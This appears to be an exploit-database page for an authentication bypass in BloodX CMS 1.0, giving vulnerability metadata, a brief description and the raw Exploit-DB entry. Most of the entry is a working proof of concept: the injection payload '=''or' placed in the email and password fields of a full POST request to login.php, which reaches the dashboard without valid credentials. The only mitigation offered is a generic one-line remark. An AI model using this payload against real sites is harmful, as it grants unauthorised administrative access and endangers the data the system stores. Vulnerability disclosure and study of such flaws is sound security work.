header-logo
Suggest Exploit
vendor:
BloodX
by:
BKpatron
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: BloodX
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:diveshlunker:bloodx:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Win 10
2020

BloodX CMS 1.0 – Authentication Bypass

BloodX CMS 1.0 is vulnerable to authentication bypass. Attacker can bypass login page and access to dashboard page by sending a POST request with payload '=''or' to the vulnerable file login.php.

Mitigation:

Implement strong authentication mechanism and use secure coding practices.
Source

Exploit-DB raw data:

# Exploit Title: BloodX CMS 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-09-02
# Exploit Author: BKpatron
# Vendor Homepage: https://github.com/diveshlunker/BloodX
# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/BloodX-master/login.php

POST /BloodX-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Referer: http:/localhost/BloodX-master/login.php
Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN